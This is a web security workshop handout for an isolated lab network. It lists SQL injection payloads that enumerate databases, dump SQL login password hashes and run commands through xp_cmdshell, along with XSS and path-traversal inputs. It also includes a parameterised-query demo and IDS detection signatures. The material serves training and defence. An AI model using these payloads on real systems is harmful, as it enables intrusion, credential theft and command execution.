OWASP Belgium
-------------

10.0.1.9			- This is the IDS


10.0.1.10			- This is the WebServiceApp


10.0.1.12			- This is the Win2K Webapp server










#######
# IDS #
#######
https://10.0.1.9
	or
https://10.0.1.9/base-1.4.5


Look for 10.0.1.7 (That's Joe) to see if he's being detected while doing the labs below.

You can also take note of your own IP address and see if you are being detected while performing the labs below.







#############################
# Let's have some fun!!!!!! #
#############################


Here is a web app that you can play with while I'm talking....

10.0.1.8



Here is the same app
10.0.1.11












=-=-=-= Lab 1  Simple Ways To Identify SQL Injection =-=-=-=


http://10.0.1.10/


http://10.0.1.10/bookdetail.aspx?id=2


http://10.0.1.10/bookdetail.aspx?id=2'		<-- A way to find SQLi


http://10.0.1.10/bookdetail.aspx?id='		<-- A way to find SQLi









=-=-=-= Lab 2  Advanced Ways To Identify SQL Injection =-=-=-=


Let's pretend that there is no error message when we insert the tick ('). Another way to determine if SQLi is possible is to use parentheses to perform simple arithmetic tests.


Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
-------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=(2)		<-- Another way to find SQLi


http://10.0.1.10/bookdetail.aspx?id=(4-2)	<-- Another way to find SQLi - the database evaluates this to 2, so the same page comes back and we know SQL injection is possible


http://10.0.1.10/bookdetail.aspx?id=(4-1)	<-- Another way to find SQLi - this evaluates to 3, so you'll see that it yields a different page








=-=-=-= Lab 3  Database Enumeration =-=-=-=

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--








#####################################################
# ERROR SQL INJECTION - EXTRACT 1st  DATABASE TABLE #
#####################################################

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.



####################################################
# ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
####################################################

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sqlmapoutput')--

Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.


####################################################
# ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
####################################################

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.







=-=-=-= Lab 4  Union Based SQL Injection =-=-=-=

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 order by 100--

http://10.0.1.10/bookdetail.aspx?id=2 order by 50--

http://10.0.1.10/bookdetail.aspx?id=2 order by 25--

http://10.0.1.10/bookdetail.aspx?id=2 order by 10--

http://10.0.1.10/bookdetail.aspx?id=2 order by 5--

http://10.0.1.10/bookdetail.aspx?id=2 order by 6--

http://10.0.1.10/bookdetail.aspx?id=2 order by 7--

http://10.0.1.10/bookdetail.aspx?id=2 order by 8--

http://10.0.1.10/bookdetail.aspx?id=2 order by 9--

http://10.0.1.10/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--











=-=-=-= Lab 5  True/False SQL Injection =-=-=-=



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1=1--

http://10.0.1.10/bookdetail.aspx?id=2 or 1=2--

http://10.0.1.10/bookdetail.aspx?id=1*1



You should notice that you get one page when you submit a true statement, and another one when you submit a false statement.

This is the basis of how boolean-based (true/false) SQL injection works.
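Why the tick in Lab 1, the (4-2) arithmetic in Lab 2 and the or 1=1 / or 1=2 pair above behave as they do, as an added example that is not part of the handout or the lab application: the vulnerable lookup concatenates the id straight into the query, the hardened one allowlists a plain integer and binds it as a parameter. SQLite stands in for the lab's SQL Server, and the books table is constructed.

```python
import re
import sqlite3

# Constructed stand-in for the lab's book table. SQLite replaces SQL Server,
# but for these probes it evaluates arithmetic and '--' comments the same way.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO books VALUES (?, ?)",
                   [(1, "Book One"), (2, "Book Two"), (3, "Book Three")])
    return db

def lookup_vulnerable(db, raw_id):
    # The pattern the labs exploit: the query-string value is concatenated
    # verbatim, so the database evaluates whatever the client sent.
    sql = "SELECT title FROM books WHERE id=" + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "error: " + str(exc)   # the verbose error the tick (') test relies on
    return row[0] if row else "not found"

BOOK_ID = re.compile(r"[0-9]{1,9}")   # allowlist: a short decimal integer, nothing else

def lookup_hardened(db, raw_id):
    # Validate the shape first, then bind the value as a parameter so the
    # database never parses client input as SQL. Binding alone would still run
    # the query with the string "2 or 1=1--" and silently return nothing.
    if not BOOK_ID.fullmatch(raw_id):
        return "rejected"
    row = db.execute("SELECT title FROM books WHERE id=?", (int(raw_id),)).fetchone()
    return row[0] if row else "not found"

if __name__ == "__main__":
    db = make_db()
    for probe in ["2", "2'", "(4-2)", "(4-1)", "2 or 1=1--", "2 or 1=2--"]:
        print(f"{probe!r:14} vulnerable={lookup_vulnerable(db, probe)!r:26} "
              f"hardened={lookup_hardened(db, probe)!r}")
```

With the vulnerable lookup, (4-2) returns the same book as 2 and the true/false pair returns different first rows; the hardened lookup rejects every probe before it reaches the database.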





Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1 >-1#

http://10.0.1.10/bookdetail.aspx?id=2 or 1<99#

http://10.0.1.10/bookdetail.aspx?id=2 or 1<>1#

http://10.0.1.10/bookdetail.aspx?id=2 or 2 != 3--

http://10.0.1.10/bookdetail.aspx?id=2 &0#






Tell me what these commands do (1 point for each command), and do they get detected by the IDS:
------------------------------------------------------------------------------------------------

Browse to the following URL:

	http://10.0.1.12/book/





In the Search box type each of the following:


	<script>alert('xss')</script>


	<script>alert(1)</script>

	<script>alert(String.fromCharCode(88,83,83))</script>

	%3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E

	prompt('xss')

	prompt%28%27xss%27%29






http://10.0.1.12/book/			

	Click "ASP"




http://10.0.1.12/book/Books.asp?STechID=1		

	Click "Professional ASP"



http://10.0.1.12/book/ViewBookDetails.asp?STechID=1&BookID=1	

	Click "Write A Review"
	In the "Write Your Review" box type:


	<script>alert('xss')</script>




http://10.0.1.12/book/				

	Click "ASP"




http://10.0.1.12/book/Books.asp?STechID=1				

	Click "Professional ASP"





http://10.0.1.12/book/ViewBookDetails.asp?STechID=1&BookID=1	

	Click "Upload Review"



Create a file called yourname.txt - and in the file insert the text: 

<script>alert('xss')</script>



	Upload the newly created file






=-=-=-= Lab 9  Classic Manual SQL Injection =-=-=-=


Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1; waitfor delay '00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'yourname'+waitfor+delay+'00:00:10'--




Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'dbo'+waitfor+delay+'00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_yourname.txt'--



Go to the address below in firefox:
http://10.0.1.12/book/dir_yourname.txt

	Did it work?














###############################
# Trading Web App on 10.0.1.8 #
###############################

Search Box:
	Joe'+OR+1=1;--


	<script>alert(123);</script>
	
	WebScarab (change search request to):
	http://10.0.1.8/Searchresult.aspx?<script>alert(123);</script>=ScriptName


	xss_upload.txt (Upload Bulk Order)
	<script>alert(123);</script>


Login Box:

	' or 1=1 or ''='
	anything



Contact Us:
	WebScarab (change the request to):
	http://10.0.1.8/OpenPage.aspx?filename=../../../../boot.ini







Inquiry:
	Joe McCray
	1234567890
	joe@strategicsec.com') waitfor delay '00:00:10'--









#########################################
# Trading Web App with WAF on 10.0.1.11 #
#########################################


Search Box:
	Joe'+OR+1='1


	<script>alert(123);</script>
	
	WebScarab (change search request to):
	http://10.0.1.11/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName


	xss_upload.txt (Upload Bulk Order)
	<script>alert(123);</script>


Login Box:

	' or 1=1 or ''='
	anything
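The detection side of the "does it get detected by the IDS" question, as an added example that is not part of the handout or the lab IDS: signatures for the probe families used in the labs above, run over constructed W3C-style log lines for Joe's host (10.0.1.7). The %uXXXX handling covers the encoding used against the WAF on 10.0.1.11; the log format and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe families used in the labs above. They are applied
# to the decoded request, because the raw log line may hide them in encoding.
SIGNATURES = {
    "sqli-error":   re.compile(r"(?i)\bsysobjects\b|\bdb_name\s*\("),
    "sqli-union":   re.compile(r"(?i)\border\s+by\s+\d+|\bunion\s+(all\s+)?select\b"),
    "sqli-boolean": re.compile(r"(?i)\bor\s+\d+\s*(=|<>|!=|<|>)\s*-?\d+"),
    "sqli-time":    re.compile(r"(?i)\bwaitfor\s+delay\b"),
    "sqli-exec":    re.compile(r"(?i)\bxp_cmdshell\b"),
    "xss":          re.compile(r"(?i)<\s*script\b|\b(alert|prompt)\s*\("),
    "traversal":    re.compile(r"(\.\./){2,}"),
}

def decode_request(target):
    """Undo the encodings the labs use: %XX, '+' for space, and the
    non-standard %uXXXX form that unquote_plus() alone leaves untouched."""
    target = re.sub(r"%u([0-9a-fA-F]{4})",
                    lambda m: chr(int(m.group(1), 16)), target)
    return unquote_plus(target)

def classify(target):
    """Return the sorted signature names that fire on one decoded request."""
    decoded = decode_request(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(text):
    """Parse constructed W3C-style lines (date time c-ip method uri-stem uri-query)
    and return (client-ip, uri-stem, tags) for each line that fires a signature."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ", 5)
        if len(fields) < 6:
            continue                      # header or malformed line
        _date, _time, ip, _method, stem, query = fields
        tags = classify(stem + "?" + query)
        if tags:
            hits.append((ip, stem, tags))
    return hits

# Constructed sample log: Joe's host replaying requests from the labs above.
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.1.7 GET /bookdetail.aspx id=2
2024-01-01 10:00:05 10.0.1.7 GET /bookdetail.aspx id=2+or+1+in+(select+top+1+name+from+sysobjects+where+xtype=char(85))--
2024-01-01 10:00:09 10.0.1.7 GET /bookdetail.aspx id=-2+union+all+select+1,user,@@version,4,5,6,7,8,9--
2024-01-01 10:00:12 10.0.1.7 GET /book/Books.asp STechID=1;exec+master..xp_cmdshell+'ping+-n+8+127.0.0.1'--
2024-01-01 10:00:20 10.0.1.7 GET /Searchresult.aspx %u003cscript>prompt(123)%u003c/script>=ScriptName
2024-01-01 10:00:25 10.0.1.7 GET /OpenPage.aspx filename=../../../../boot.ini
"""
```

The Lab 2 arithmetic probes such as (4-2) fire nothing here, which is the point of that lab: they contain no keyword to match, so that case has to be caught by the application rejecting non-integer ids rather than by a signature.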



